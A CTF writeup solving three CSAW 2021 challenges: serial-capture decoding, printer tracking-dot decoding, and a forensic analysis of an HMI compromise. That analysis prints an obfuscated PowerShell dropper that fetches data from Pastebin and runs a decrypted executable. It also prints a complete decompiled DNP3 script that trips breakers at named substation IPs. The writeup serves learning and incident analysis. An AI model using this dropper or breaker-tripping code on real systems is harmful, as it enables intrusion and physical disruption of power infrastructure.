CSAW CTF 2021 Writeups

Pretty fun challenges (those that I solved at least) :) I usually don’t even dare to touch anything ICS/SCADA related, but it turns out that these weren’t overly technical. We were also so close to solving the last Web challenge ‘scp-terminal’! We had all steps nailed down except the very last…

Details	Links
CTFtime.org Event Page	https://ctftime.org/event/1315

ICS

A Different Type of Serial Key

Attached are serial captures of two different uploads to an embedded device. One of these uploads is a key and the other is a function block. Your goal is to decode the serial traffic, extract the key and function block, and use these to find the flag. The flag will be in format flag{}.
Author: CISA
Attached: capture.sal, key.sal

To analyze serial captures, we can use Saleae Logic 2.

Extracting Function Block

capture.sal has 4 Channels.

4 Channels for 'capture.sal' in Saleae Logic 2

After reading other writeups online, I deduced this to be SPI communication where

Channel 0 is the Clock because it is at a constant frequency
Channel 1 is the Enable signal because it falls just before the Clock and Data starts and rises just after the Clock and Data stops; no other changes
Channel 2 is empty
Channel 3 is a Data signal because it has irregular signals that only occur within the intervals of the Channel 0 Clock, and aligns with the Clock’s edges

Since there is only one Data channel, it can be assigned to either MISO (Master In Slave Out) or MOSI (Master Out Slave In); it does not matter.
Knowing this, we can setup the SPI Analyzer with the correct Channels. In this case I chose MOSI for the single Data channel. The other settings can be left as default because it happens to be correct for this situation.

SPI Analyzer configuration for 'capture.sal' in Saleae Logic 2

If we then turn on ASCII display for our SPI Analyzer and zoom out, we get a very nice looking string with no errors! The extracted ASCII characters are also shown in a table on the right, under the ‘Data’ section.

Turning on ASCII output for SPI Analyzer in Saleae Logic 2

We can turn off all columns except mosi since that’s where our ASCII data is contained, and then do an Export Table either to CSV or to clipboard.

Exporting Table Data for SPI Analyzer in Saleae Logic 2

Clean up the data by removing the table headers and replacing instances of \n with actual newline characters and you should get something like this!

S00C00004C6F63616C204B6579BF
S221020018423B165105BDAAFF27DB3B5D223497EA549FDC4D27330808F7F95D95B0EC
S5030001FBS0210000506F77657250432042696720456E6469616E2033322D42697420537475620E
S12304EC9421FFD093E1002C7C3F0B78907F000C909F000839200000913F001C4800012C7E
S123050C813F001C552907FE2F890000409E0058813F001C815F000C7D2A4A1489290000FF
S123052C7D2A07743D20100281090018813F001C7D284A14892900003929FFFD5529063EC7
S123054C7D2907747D494A787D280774813F001C815F00087D2A4A14550A063E9949000074
S123056C480000BC815F001C3D205555612955567D0A48967D49FE707D2940501D29000317
S123058C7D2950502F890000409E0058813F001C815F000C7D2A4A14892900007D2A077476
S12305AC3D20100281090018813F001C7D284A1489290000392900055529063E7D2907743F
S12305CC7D494A787D280774813F001C815F00087D2A4A14550A063E99490000480000408D
S12305EC813F001C815F000C7D2A4A14890900003D20100281490018813F001C7D2A4A145A
S123060C89490000813F001C80FF00087D274A147D0A5278554A063E99490000813F001CA1
S123062C39290001913F001C813F001C2F89001C409DFED0813F00083929001D3940000040
S11B064C9949000060000000397F003083EBFFFC7D615B784E80002060
S503000CF0

If we throw it into IDA Pro, we see that this is actually a Motorola S-record.

I wanted to know what processor the binary executable code in the S-record was for, so I googled the first few bytes and multiple results pointed to PowerPC as the answer.

Google result identifying same machine code as belonging to the PowerPC processor

We can now reload the file into IDA and select ‘PowerPC big-endian’ as the processor type! There’ll be a few prompts following that, but no worries. Select ppc as the device name, cancel the dialog box for Loaded information type, and pick 32-bit ISA for the instruction set architecture.

Selecting PowerPC big-endian processor type in IDA Pro

Create a function at the start of the disassembled code with ‘P’, and then we can decompile it nicely with ‘F5’.

Creating function at start of disassembly in IDA Pro

Decompiled function block shows XOR routine in IDA Pro

The function block sub_4EC loops through 29 bytes stored at 0x10020018, XORs each byte with a byte from the argument key, and then stores it in result. We just need to know the key and then we can calculate our own result which is probably the flag or something!

Replicating the decryption pseudocode routine in Python, it looks like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


# bytes present from memory location
stuff = [
  0x42, 0x3B, 0x16, 0x51, 0x05, 0xBD, 0xAA, 0xFF, 0x27, 0xDB, 
  0x3B, 0x5D, 0x22, 0x34, 0x97, 0xEA, 0x54, 0x9F, 0xDC, 0x4D, 
  0x27, 0x33, 0x08, 0x08, 0xF7, 0xF9, 0x5D, 0x95, 0xB0
]

key = [
  # unknown
]

result = [0] * 30

for i in range(29):
    if (i & 1) != 0:
        if i % 3:
            byte = key[i] ^ stuff[i]
        else:
            byte = key[i] ^ (stuff[i] + 5)
        result[i] = byte
    else:
        result[i] = key[i] ^ (stuff[i] - 3)

# print result which is probably the flag
print("".join([chr(x) for x in result]))

Extracting Key

key.sal has 2 visible Channels.

2 visible Channels for 'key.sal' in Saleae Logic 2

Similarly, with online writeups I reasoned that this could be I2C communication where

Channel 0 is the Clock (SCL) because it has a consistent pulse
Channel 1 is the Data (SDA) because it occurs irregularly within the intervals of the Clock signals

So just set up the I2C Analyzer with the correct channels,

I2C Analyzer configuration for 'key.sal' in Saleae Logic 2

and we will get a nice 29 bytes of Hex data parsed from the serial traffic. We can also see that these bytes are being read at an address 0x08.

Hex data for I2C communication in 'key.sal' in Saleae Logic 2

Extract the bytes the same way as we did for the function block by turning off irrelevant columns and exporting the table, and the result cleaned up is essentially the key that we need for our function block!

1
2
3
4
5


key = [
    0x59, 0x57, 0x72, 0x31, 0x79, 0xCE, 0x94, 0x8D, 0x15, 0xD4,
    0x54, 0x02, 0x7C, 0x5C, 0xA0, 0x83, 0x3D, 0xAC, 0xB7, 0x2A,
    0x17, 0x67, 0x76, 0x38, 0x98, 0x8F, 0x69, 0xE8, 0xD0
]

Final Decryption Script

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27


# bytes present from memory location
stuff = [
  0x42, 0x3B, 0x16, 0x51, 0x05, 0xBD, 0xAA, 0xFF, 0x27, 0xDB, 
  0x3B, 0x5D, 0x22, 0x34, 0x97, 0xEA, 0x54, 0x9F, 0xDC, 0x4D, 
  0x27, 0x33, 0x08, 0x08, 0xF7, 0xF9, 0x5D, 0x95, 0xB0
]

key = [
    0x59, 0x57, 0x72, 0x31, 0x79, 0xCE, 0x94, 0x8D, 0x15, 0xD4,
    0x54, 0x02, 0x7C, 0x5C, 0xA0, 0x83, 0x3D, 0xAC, 0xB7, 0x2A,
    0x17, 0x67, 0x76, 0x38, 0x98, 0x8F, 0x69, 0xE8, 0xD0
]

result = [0] * 30

for i in range(29):
    if (i & 1) != 0:
        if i % 3:
            byte = key[i] ^ stuff[i]
        else:
            byte = key[i] ^ (stuff[i] + 5)
        result[i] = byte
    else:
        result[i] = key[i] ^ (stuff[i] - 3)

# print result which is probably the flag
print("".join([chr(x) for x in result]))

Flag: flag{s3r14l_ch4ll3ng3_s0lv3r}

Tripping Breakers

Attached is a forensics capture of an HMI (human machine interface) containing scheduled tasks, registry hives, and user profile of an operator account. There is a scheduled task that executed in April 2021 that tripped various breakers by sending DNP3 messages. We would like your help clarifying some information. What was the IP address of the substation_c, and how many total breakers were tripped by this scheduled task? Flag format: flag{IP-Address:# of breakers}. For example if substation_c’s IP address was 192.168.1.2 and there were 45 total breakers tripped, the flag would be flag{192.168.1.2:45}.

Author: CISA
Attached: hmi_host_data.zip

In the .zip file,

host\scheduled_tasks.csv contains scheduled tasks
host\Registry\SOFTWARE_ROOT.json contains registry hives
host\operator contains the User-Profile folder of a Windows account

Powershell Scheduled Task

I first opened up scheduled_tasks.csv, sorted by Last Run Time and focused on tasks that were run in April 2021 (i.e. 4/1/2021).

Powershell script execution in Scheduled Tasks CSV

In the sea of various system binaries, a Powershell entry stood out: wcr_flail.ps1 was run with -ExecutionPolicy Bypass. Suspicious. Since it resided in the the %temp% directory, we can retrieve it from the operator User-Profile folder - specifically under operator\AppData\Local\Temp.

After formatting the script nicely with newlines, this is what it looks like:

1
2
3
4
5
6
7
8


$SCOP = ((new-object System.Net.WebClient).DownloadString("https://pastebin.com/raw/rBXHdE85")).Replace("!","f").Replace("@","q").Replace("#","z").Replace("<","B").Replace("%","K").Replace("^","O").Replace("&","T").Replace("*","Y").Replace("[","4").Replace("]","9").Replace("{","=");
$SLPH = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($SCOP));
$E=(Get-ItemProperty -Path $SLPH -Name Blast)."Blast";
$TWR =  "!M[[pcU09%d^kV&l#9*0XFd]cVG93<".Replace("!","SEt").Replace("@","q").Replace("#","jcm").Replace("<","ZXI=").Replace("%","GVF").Replace("^","BU").Replace("&","cTW").Replace("*","zb2Z").Replace("[","T").Replace("]","iZW1").Replace("{","Fdi");
$BRN = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($TWR));
$D= (Get-ItemProperty -Path $BRN -Name Off)."Off";
openssl aes-256-cbc -a -A -d -salt -md sha256 -in $env:temp$D -pass pass:$E -out "c:\1\fate.exe";
C:\1\fate.exe;

Decoding Second-Stage Payload

A payload is retrieved from Pastebin, deobfuscated, Base64-decoded and then used as a Path to get an Item Property from.
We can debug the Powershell script in Windows Powershell ISE and evaluate expressions at runtime with ease to find out what is the Path contained in the $SLPH variable.

[DBG]: PS C:\Users\[redacted]>> $SLPH
HKLM:\SOFTWARE\Microsoft\Windows\TabletPC\Bell

It’s a registry path! Good thing we have the registry hives JSON file then. I opened up SOFTWARE_ROOT.json in EmEditor since it’s a large file and used the TidyJSON Macro to format the JSON nicely.
Since the Powershell script tries to get the Data associated with Value Name Blast at Key HKLM\SOFTWARE\Microsoft\Windows\TabletPC\Bell, I searched for Blast and retrieved the Data as M4RK_MY_W0Rd5.

Searching for Blast in the registry hive JSON file

Repeating this same process with the $BRN Path decoded from $TWR, we get \\EOTW\\151.txt stored at Value Name Off at HKLM\SOFTWARE\Microsoft\Wbem\Tower.

Searching for Tower in the registry hive JSON file

The Powershell script is then essentially simplified to this:

1
2
3
4


$E = "M4RK_MY_W0Rd5"
$D = "\\EOTW\\151.txt"
openssl aes-256-cbc -a -A -d -salt -md sha256 -in $env:temp$D -pass pass:$E -out "c:\1\fate.exe";
C:\1\fate.exe;

Referencing the manual page for openssl, we can understand that the SHA256 hash of M4RK_MY_W0Rd5 is used to generate the AES-256-CBC key to decrypt the Base64-encoded data in %temp%\EOTW\151.txt. The decrypted data is then executed.
Since 151.txt is in the %temp% folder, we can retrieve it from the operator User-Profile folder as well. After that, we can replicate the decryption easily to get the second-stage payload fate.exe (just make sure you have openssl):

1

cat 151.txt | openssl aes-256-cbc -a -A -d -salt -md sha256 -pass pass:"M4RK_MY_W0Rd5" -out fate.exe

Decompiling to Python

The decrypted fate.exe has a PyInstaller file icon and is also detected as a PyInstaller executable by Exeinfo PE.

Exeinfo PE detecting fate.exe as PyInstaller 3.6

Thus, we can use PyInstaller Extractor to extract the Python files contained within the .exe.
However, do note that it is important to run the extractor using the same Python version that was used to make the executable that we are trying to extract. But how would we know which version was used for the executable? PyInstaller Extractor will tell you in the first few lines of its output even if you run it with the wrong Python version:

1
2
3
4
5


D:\Downloads\CSAW\hmi_host_data>"D:\Data\Python36\python.exe" pyinstextractor.py fate.exe
[+] Processing fate.exe
[+] Pyinstaller version: 2.1+
[+] Python version: 36
...

In this case since the Python version detected in fate.exe is 36, I installed Python 3.6.8 and reran the extractor script.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


D:\Downloads\CSAW\hmi_host_data>"D:\Data\Python36\python.exe" pyinstextractor.py fate.exe
[+] Processing fate.exe
[+] Pyinstaller version: 2.1+
[+] Python version: 36
[+] Length of package: 5716392 bytes
[+] Found 59 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: trip_breakers.pyc
[+] Found 133 files in PYZ archive
[+] Successfully extracted pyinstaller archive: fate.exe

You can now use a python decompiler on the pyc files within the extracted directory

trip_breakers.pyc sounds like what we want! But because it still in compiled bytecode format (.pyc), we will use uncompyle6 to decompile it back into normal Python source code.

1
2
3
4
5
6
7


D:\Downloads\CSAW\hmi_host_data\fate.exe_extracted>uncompyle6 trip_breakers.pyc
# uncompyle6 version 3.7.5.dev0
# Python bytecode 3.6 (3379)
# Decompiled from: Python 3.6.8 (tags/v3.6.8:3c6b436a57, Dec 24 2018, 00:16:47) [MSC v.1916 64 bit (AMD64)]
# Embedded file name: trip_breakers.py
[... source code shifted below ...]
# okay decompiling trip_breakers.pyc

Source Code Analysis

I shifted out the source code from the output above to here:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83


import struct, socket, time, sys
from crccheck.crc import Crc16Dnp
OPT_1 = 3
OPT_2 = 4
OPT_3 = 66
OPT_4 = 129

class Substation:

    def __init__(self, ip_address, devices):
        self.target = ip_address
        self.devices = []
        self.src = 50
        self.transport_seq = 0
        self.app_seq = 10
        for device in devices:
            self.add_device(device)

        self.connect()

    def connect(self):
        print('Connecting to {}...'.format(self.target))
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.connect((self.target, 20000))
        print('Connected to {}'.format(self.target))

    def add_device(self, device):
        self.devices.append({'dst':device[0],  'count':device[1]})

    def activate_all_breakers(self, code):
        for device in self.devices:
            dnp3_header = self.get_dnp3_header(device['dst'])
            for x in range(1, device['count'] * 2, 2):
                dnp3_packet = dnp3_header + self.get_dnp3_data(x, OPT_1, code)
                self.socket.send(dnp3_packet)
                time.sleep(2)
                dnp3_packet = dnp3_header + self.get_dnp3_data(x, OPT_2, code)
                self.socket.send(dnp3_packet)
                time.sleep(5)

    def get_dnp3_header(self, dst):
        data = struct.pack('<H2B2H', 25605, 24, 196, dst, self.src)
        data += struct.pack('<H', Crc16Dnp.calc(data))
        return data

    def get_dnp3_data(self, index, function, code):
        data = struct.pack('<10BIH', 192 + self.transport_seq, 192 + self.app_seq, function, 12, 1, 23, 1, index, code, 1, 500, 0)
        data += struct.pack('<H', Crc16Dnp.calc(data))
        data += struct.pack('<HBH', 0, 0, 65535)
        self.transport_seq += 1
        self.app_seq += 1
        if self.transport_seq >= 62:
            self.transport_seq = 0
        if self.app_seq >= 62:
            self.app_seq = 0
        return data


def main():
    if socket.gethostname() != 'hmi':
        sys.exit(1)
    substation_a = Substation('10.95.101.80', [(2, 4), (19, 8)])
    substation_b = Substation('10.95.101.81', [(9, 5), (8, 7), (20, 12), (15, 19)])
    substation_c = Substation('10.95.101.82', [(14, 14), (9, 16), (15, 4), (12, 5)])
    substation_d = Substation('10.95.101.83', [(20, 17), (16, 8), (8, 14)])
    substation_e = Substation('10.95.101.84', [(12, 4), (13, 5), (4, 2), (11, 9)])
    substation_f = Substation('10.95.101.85', [(1, 4), (3, 9)])
    substation_g = Substation('10.95.101.86', [(10, 14), (20, 7), (27, 4)])
    substation_h = Substation('10.95.101.87', [(4, 1), (10, 9), (13, 6), (5, 21)])
    substation_i = Substation('10.95.101.88', [(14, 13), (19, 2), (8, 6), (17, 8)])
    substation_a.activate_all_breakers(OPT_3)
    substation_b.activate_all_breakers(OPT_4)
    substation_c.activate_all_breakers(OPT_4)
    substation_d.activate_all_breakers(OPT_4)
    substation_e.activate_all_breakers(OPT_3)
    substation_f.activate_all_breakers(OPT_4)
    substation_g.activate_all_breakers(OPT_3)
    substation_h.activate_all_breakers(OPT_4)
    substation_i.activate_all_breakers(OPT_4)


if __name__ == '__main__':
    main()

To find substation_c’s IP address, we just need to look on line 64 where the Substation object is instantiated with an IP address of 10.95.101.82.
To find the total number of breakers tripped, we first need to understand what is the DNP3 TRIP Control Code.
In this user manual https://download.schneider-electric.com/files?p_Doc_Ref=SEPED305001EN, the Control Code is described as 8 bits of data with bits 7 and 6 being 10 for a TRIP code. Along with the Q and Cl bits being 0 for normal operation, and the Code being 0001 = 1 for Pulse On, the TRIP Control Code would then be 1000 0001 = 129, which matches OPT_4 in the Python code (initialised at line 6)!

DNP3 Control Code format specification from a Schneider Electric User Manual

Another manual online also corroborated my findings that the TRIP Control Code is OPT_4 = 129 (0x81).

DNP3 Control Code format specification from a Software toolbox User Manual

Going back to the code, we see that OPT_4 is sent to Substations B, C, D, F, H, I, through the activate_all_breakers function.

1
2
3
4
5
6
7
8
9


substation_a.activate_all_breakers(OPT_3)
substation_b.activate_all_breakers(OPT_4)
substation_c.activate_all_breakers(OPT_4)
substation_d.activate_all_breakers(OPT_4)
substation_e.activate_all_breakers(OPT_3)
substation_f.activate_all_breakers(OPT_4)
substation_g.activate_all_breakers(OPT_3)
substation_h.activate_all_breakers(OPT_4)
substation_i.activate_all_breakers(OPT_4)

At first glance, activate_all_breakers appears to loop through each device in each substation (line 5), and send the TRIP Control Code OPT_4 to each device multiple times specified by device['count'] (line 7).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19


    def add_device(self, device):
        self.devices.append({'dst':device[0],  'count':device[1]})

    def activate_all_breakers(self, code):
        for device in self.devices:
            dnp3_header = self.get_dnp3_header(device['dst'])
            for x in range(1, device['count'] * 2, 2):
                ...
                dnp3_packet = dnp3_header + self.get_dnp3_data(x, OPT_2, code)
                self.socket.send(dnp3_packet)
                ...

    def get_dnp3_header(self, dst):
        data = struct.pack('<H2B2H', 25605, 24, 196, dst, self.src)
        ...

    def get_dnp3_data(self, index, function, code):
        data = struct.pack('<10BIH', 192 + self.transport_seq, 192 + self.app_seq, function, 12, 1, 23, 1, index, code, 1, 500, 0)
        ...

However, looking at this paper https://arxiv.org/pdf/2102.11455.pdf made me realize that device['count'] actually represented the number of different devices. While device determined the dst to be used by get_dnp3_header, device['count'] determined the index used in get_dnp3_data. And this index actually identifies unique devices!

Explanation of DNP3 communication in a research paper

Thus, to calculate the number of breakers tripped, i.e. the number of devices that the TRIP Control Code was sent to, we add up all the values of device['count'] for Substations B, C, D, F, H, I.
Modifying the decompiled Python script:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33


class Substation:

    def __init__(self, ip_address, devices):
        self.devices = []
        for device in devices:
            self.add_device(device)

    def add_device(self, device):
        self.devices.append({'dst':device[0],  'count':device[1]})
    
    def __len__(self):
        total = 0
        for device in self.devices:
            total += device['count']
        return total


def main():
    substation_b = Substation('10.95.101.81', [(9, 5), (8, 7), (20, 12), (15, 19)])
    substation_c = Substation('10.95.101.82', [(14, 14), (9, 16), (15, 4), (12, 5)])
    substation_d = Substation('10.95.101.83', [(20, 17), (16, 8), (8, 14)])

    substation_f = Substation('10.95.101.85', [(1, 4), (3, 9)])

    substation_h = Substation('10.95.101.87', [(4, 1), (10, 9), (13, 6), (5, 21)])
    substation_i = Substation('10.95.101.88', [(14, 13), (19, 2), (8, 6), (17, 8)])

    substations = (substation_b, substation_c, substation_d, substation_f, substation_h, substation_i)
    
    print("Total Breakers: {}".format(sum(len(s) for s in substations)))

if __name__ == '__main__':
    main()

1
2


D:\Downloads\CSAW>get_breakers_count.py
Total Breakers: 200

Flag: flag{10.95.101.82:200}

Forensics

mic

My Epson InkJet printer is mysteriously printing blank pages. Is it trying to tell me something?

Attached: scan.pdf

scan.pdf looks like 34 blank pages, but if you zoom in a good bit you’ll notice that the pages are covered with numerous yellow dots. This is actually Machine Identification Code (MIC), which explains the challenge’s title.

To decode these dots, the common solution is to first use pdftoppm to convert the PDF pages into image files, then use deda_parse_print from deda to parse the image files for the identification information contained within. So if we do that and just test out deda_parse_print on the first PDF page, we get the following output:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37


_|0|1|2|3|4|5|6|7
0|
1|.
2|.
3|.
4|              .
5|            .
6|.
7|.
8|.         . .
9|        .   . .
0|.       .     .
1|        .
2|.           . .
3|.
4|.
5|  . . .     . .
        27 dots.



<TDM of Pattern 4 at 0.32 x 0.64 inches>
Decoded:
        manufacturer: Epson
        serial: -000102-
        timestamp: 2006-11-09 08:00:00
        raw: 0000000102000006110908030000
        minutes: 00
        hour: 08
        day: 09
        month: 11
        year: 06
        unknown1: 00
        unknown3: 00
        unknown4: 00
        unknown5: 00
        printer: 00000102

The value in serial and printer looks like an ASCII character code. In particular, the value for this first page represents f and could be the first character of the flag. So all we need to do is probably just run deda_parse_print on all the PDF pages and extract either the serial or printer value from the output.
However, I sought for a solution that did not require external dependencies and could all be done with just Python libraries in a single script for the entire process. This led me to use PyMuPDF for the PDF-to-image conversion, and libdeda from deda instead of the binaries.

PyMuPDF is imported as fitz and is used to read the PDF and configure the DPI of the saved image using a Matrix. It is also then important to pass this same DPI value to libdeda’s PrintParser, otherwise it will make an incorrect assumption of the image’s DPI and fail to detect the tracking dots. In my script below, I retrieved the value from printer to form the flag string.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31


import fitz
from libdeda.print_parser import *

fname = "scan.pdf"
doc = fitz.open(fname)
dpi = 500
zoom = dpi / 72
mat = fitz.Matrix(zoom, zoom)

flag = ""

for page in doc:
    pix = page.get_pixmap(matrix=mat)
    pix.save("scan_{}.png".format(page.number))
    
    pp = PrintParser("scan_{}.png".format(page.number), dict(inputDpi=dpi))

    # just for show
    print(pp.tdm)

    decoded = pp.tdm.decode()

    printer = chr(int(decoded["printer"]))
    flag += printer

    # just for show
    for key in ["manufacturer", "serial", "timestamp", "raw"]+list(decoded.keys()):
        if key not in decoded: continue
        print("\t%s: %s"%(key, decoded.pop(key)))            

print(flag)

Flag: flag{watchoutforthepoisonedcoffee}

Thanks for stopping by :)